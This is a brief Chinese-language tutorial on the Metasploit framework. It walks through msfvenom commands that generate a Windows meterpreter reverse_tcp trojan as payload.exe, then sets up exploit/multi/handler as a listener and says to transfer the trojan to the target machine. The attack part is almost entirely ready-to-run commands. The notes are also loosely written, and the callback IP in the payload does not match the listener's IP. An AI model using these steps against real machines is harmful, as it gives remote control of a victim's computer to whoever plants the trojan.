msf是一款开源的安全漏洞检测和渗透测试框架。 输入msfconsole显示六或者五。 有6个模块。 主讲以下两个。 Exploit漏洞利用模块和payload攻击载荷模块。 Msfvenom是msf一个专门独立的负载攻击payload的模块
切换到root。msfvenom生成木马。 执行命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe Msf设置监听器可监听木马是否被点击
回到原来的界面使用命令use exploit/multi/handler.打开一个万能接收器,准备接收连接。 输入命令设置通道set payload windows/meterpreter/reverse_tcp 设置监听的IP和设置监听端口。set LHOST 192.168.80.143
set LPORT 4444 run开始执行 将木马文件传入目标机 完成
